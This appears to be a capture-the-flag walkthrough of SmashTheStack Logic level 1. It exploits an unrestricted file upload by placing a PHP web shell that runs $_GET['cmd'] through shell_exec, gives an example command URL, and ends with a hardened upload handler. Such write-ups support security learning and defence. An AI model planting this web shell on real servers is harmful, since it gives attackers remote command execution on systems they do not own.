Upon selecting level1, we are met by this page. So what now? We see some sort of upload script that allows us to upload a “clearance” to a folder. We are then instructed on where to head to find our next objective. Ok, now what?
Well, even though most of you pretty much figured this out by looking at it, we should go by the book and play it safe. Let’s look at the source:
    <html>
    <head><title>Logic @ SmashTheStack -- Level 1 (Send Security Clearance)</title></head>
    <body>
    <center>
    <table>
    <tr><td><center><H1>Level 1</H1></center></td></tr>
    <tr><td><hr width="550"></td></tr>
    <tr><td><center>Please upload your security clearance. Files will be in uploads/</center></td></tr><br><br><br>
    <tr><td>
    <center>
    <form enctype="multipart/form-data" action="send_clearance.php" method="POST">
    <input type="hidden" name="MAX_FILE_SIZE" value="100000" />
    Choose a file to upload: <input name="uploadedfile" type="file" />
    <input type="submit" value="Upload" />
    </form>
    </td></tr>
    <tr><td><center>Once clearance is obtained, poke around the user directories for access to level2</td></tr>
    <p><br>
    </table>
    </center>
    </body>
    </html>
What do we see here? Well, we see that we are POST’ing our uploaded file to send_clearance.php. Also, we see we have a max file size of 100,000 bytes (roughly 100 kB), but what does any of this mean? Well, for starters, we know we are dealing with a web server that can process/serve PHP files (most likely some flavor of Apache); also, files larger than 100 kB will probably fail (MAX_FILE_SIZE is just a hidden form field, so it is a limit the client can change, not a server-side security control). So let’s try to upload something benign, such as an image, to see where it lands. Upon uploading that image, we should see something like:
The file Tq5uPaV.jpg has been uploaded
But where is this file? If we look back at the first page, it gives us the directory of uploads/. Let’s browse to uploads/ and see if they left directory listing on.
This is where files are uploaded for level1. All files in here are removed after 24 hours.
Ok, so while we won’t be able to see everyone else’s uploads, we should still be able to view our own. Browsing to http://logic.smashthestack.org:8181/uploads/Tq5uPaV.jpg we get:
Sweet! No 404 error! So how do we use this to view a user’s home directory? Well, maybe we can push other things to the server that aren’t JPEGs… maybe something that will allow us to execute commands on this server. We know that we can push anything under 100 kB, one file at a time, so a small binary remote shell could be possible. But we would have to guess the architecture, guess the operating system, compile it, push it to the server via the upload form, and hope that the user the web server runs as (most likely apache) can execute such a file. What about a PHP file? This is closely related to Remote File Inclusion (RFI) and Local File Inclusion (LFI), except that here the server executes a PHP file we placed directly into a web-served directory. So what kind of PHP file should we upload? First we should see if we can upload and execute any PHP script at all. Let’s try:
    <?php
    echo "<pre>\n";
    echo "test";
    echo "</pre>";
    ?>
Upon execution, we get:
[Would be a picture of just “test”, but when I went back through to capture the screenshot, the server was suffering from numerous 500 errors]
We could go out and download a “c99.php” shell, but I think we should try to build our own. Our design goal is to run a command and have the output returned to us. We will want the ability to pass commands to our script via a GET variable, so that we can just change the value of that variable in the URL and receive our output instantly. We will accomplish this with shell_exec (www.php.net/shell_exec) and $_GET. See the code below for details:
    <?php
    echo "<pre>\n";
    echo "cmd = ".$_GET['cmd'];
    $cmd = $_GET['cmd'];
    echo shell_exec((string)$cmd);
    echo "</pre>";
    ?>
Upon executing this, we should be able to pass almost any Linux command as the value of the variable ‘cmd’ and receive our output. For example, simply entering http://logic.smashthestack.org:8181/uploads/cmd6.php?cmd=ls -al /home/level1/ should return a listing of level1’s home folder. It’s crude, but it is effective. From here, the rest of the solution is left as an exercise for the reader (there really isn’t much left).
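For the defensive side of what this level demonstrates, here is the kind of server-side handler that would have stopped it. This is an added example, not the challenge's own send_clearance.php; it assumes the form field name uploadedfile from the page's HTML and a hypothetical storage directory /var/clearance_uploads that sits outside the document root, and it also rejects the double-extension trick (x.jpg.php), which the page does not cover.

```php
<?php
// Hardened upload handler (illustrative, not the challenge's real code).
// Assumes the form field "uploadedfile" and a store directory outside the web root.
const MAX_BYTES = 100000;                 // enforced here; the form's hidden field is client-controlled
const ALLOWED = ['jpg' => 'image/jpeg', 'png' => 'image/png', 'gif' => 'image/gif'];

function store_clearance(array $file, string $storeDir): string
{
    // 1. PHP reported no error and the temp path really came from this request's upload.
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('no valid upload');
    }
    // 2. Size limit checked on what actually arrived, not on MAX_FILE_SIZE from the form.
    if (filesize($file['tmp_name']) > MAX_BYTES) {
        throw new RuntimeException('file too large');
    }
    // 3. Allow-list on the *last* extension only, so "clearance.jpg.php" is rejected.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!isset(ALLOWED[$ext])) {
        throw new RuntimeException('extension not allowed');
    }
    // 4. Content check that ignores the client's filename and Content-Type header.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    if ($finfo->file($file['tmp_name']) !== ALLOWED[$ext]
        || @getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('content does not match an allowed image type');
    }
    // 5. Never reuse the client's name: a random name means nothing like "cmd6.php"
    //    (or a .htaccess) can land in a served directory under a name the client chose.
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest = rtrim($storeDir, '/') . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store file');
    }
    chmod($dest, 0644);                   // readable, never executable
    return $name;
}

// /var/clearance_uploads is a hypothetical directory outside the document root; a
// separate download script can stream files back with an explicit image Content-Type.
try {
    $stored = store_clearance($_FILES['uploadedfile'] ?? [], '/var/clearance_uploads');
    echo 'The file has been uploaded as ' . htmlspecialchars($stored, ENT_QUOTES, 'UTF-8');
} catch (RuntimeException $e) {
    http_response_code(400);
    echo 'Upload rejected: ' . htmlspecialchars($e->getMessage(), ENT_QUOTES, 'UTF-8');
}
```

Even with these checks, the directory that holds uploads should have script execution disabled in the web server configuration (for Apache, `php_admin_flag engine off` or `RemoveHandler` for that location), so that a validation bypass still cannot turn an upload into code execution.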